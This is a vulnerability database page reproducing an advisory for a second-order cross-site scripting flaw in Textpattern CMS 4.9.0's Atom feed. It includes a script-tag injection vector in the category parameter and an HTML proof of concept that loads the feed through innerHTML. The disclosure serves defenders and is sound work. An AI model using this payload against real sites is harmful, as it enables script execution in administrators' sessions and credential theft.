Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Textpattern 4.9.0 Cross Site Scripting

🗓️ 26 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 92 Views

Textpattern 4.9.0 has second-order XSS via Atom feed injection from unescaped user input in Atom fields.

Code
=============================================================================================================================================
    | # Title     : Textpattern 4.9.0 Second-Order XSS via Atom Feed Injection                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://textpattern.com/                                                                                                    |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/213262/
    
    [+] Summary    : A Second-Order Cross-Site Scripting (XSS) vulnerability exists in Textpattern CMS version 4.9.0 due to improper sanitization and contextual encoding 
                     of user-supplied input embedded within Atom feed XML elements.
                     User-controlled parameters (such as category) are reflected into sensitive Atom fields including <id> and <link href> without proper XML escaping. 
    				 While the injected payload does not execute directly in modern browsers (due to XML context), it executes when the feed is consumed 
    				 by vulnerable HTML-based feed readers, admin dashboards, or CMS aggregators, resulting in JavaScript execution in a trusted context.
                     This vulnerability enables Supply-Chain XSS targeting administrative users and trusted systems.
    
    [+] Affected Product
    
    Product: Textpattern CMS
    
    Version: 4.9.0
    
    Component: Atom Feed Generator (/atom/)
    
    Attack Surface: Feed consumers (Admin panels, RSS/Atom readers)
    
    Vulnerability Type
    
    Second-Order Cross-Site Scripting (XSS)
    
    Feed Injection / Trusted Content Injection
    
    CWE / CAPEC Classification
    
    CWE-79: Improper Neutralization of Input During Web Page Generation
    
    CWE-116: Improper Encoding or Escaping of Output
    
    CAPEC-63: Cross-Site Scripting (Stored Injection)
    
    [+] Technical Details :
    
    The Atom feed endpoint reflects untrusted input directly into XML nodes:
    
    <id>
    
    <link href>
    
    Example Injection Vector
    /atom/?section=articles&category=meaningful-labor'"()%26%25<acx><ScRiPt>prompt(925482)</ScRiPt>
    
    Resulting Atom Fragment
    <id>
    tag:release-demo.textpattern.co,2005:.../articles/meaningful-labor'"()&%<acx>
    <ScRiPt>prompt(925482)</ScRiPt>
    </id>
    
    The payload is preserved without XML escaping, confirming an injection vulnerability.
    
    Exploitation Scenario (Second-Order)
    
    Attacker injects a malicious payload via Atom feed parameters.
    
    Textpattern reflects the payload into the generated Atom XML.
    
    An administrator or system consumes the feed using:
    
    Admin feed preview panels
    
    CMS importers
    
    Custom dashboards
    
    The feed content is inserted into the DOM using unsafe methods such as:
    
    element.innerHTML = feedContent;
    
    JavaScript payload executes in the context of the trusted application.
    
    [+] PoC :
    
    <!DOCTYPE html>
    <html>
    <body>
    <div id="feed"></div>
    <script>
    fetch("https://127.0.0.1/release-demo.textpattern.co/atom/?section=articles&category=meaningful-labor'%22()%26%25<acx><ScRiPt>prompt(925482)</ScRiPt>")
    .then(r => r.text())
    .then(d => document.getElementById("feed").innerHTML = d);
    </script>
    </body>
    </html>
    
    [+] Result : prompt(925482)
    
    Confirms execution
    No false positives
    Demonstrates second-order exploitation
    
    [+] Impact :
    
    Arbitrary JavaScript execution in trusted admin interfaces
    
    Session hijacking
    
    Credential theft
    
    CSRF token extraction
    
    Supply-chain compromise via trusted feeds
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Feb 2026 00:00Current
5Medium risk
Vulners AI Score5
textpattern cmssecond orderatom feedfeed injectionunescaped input
92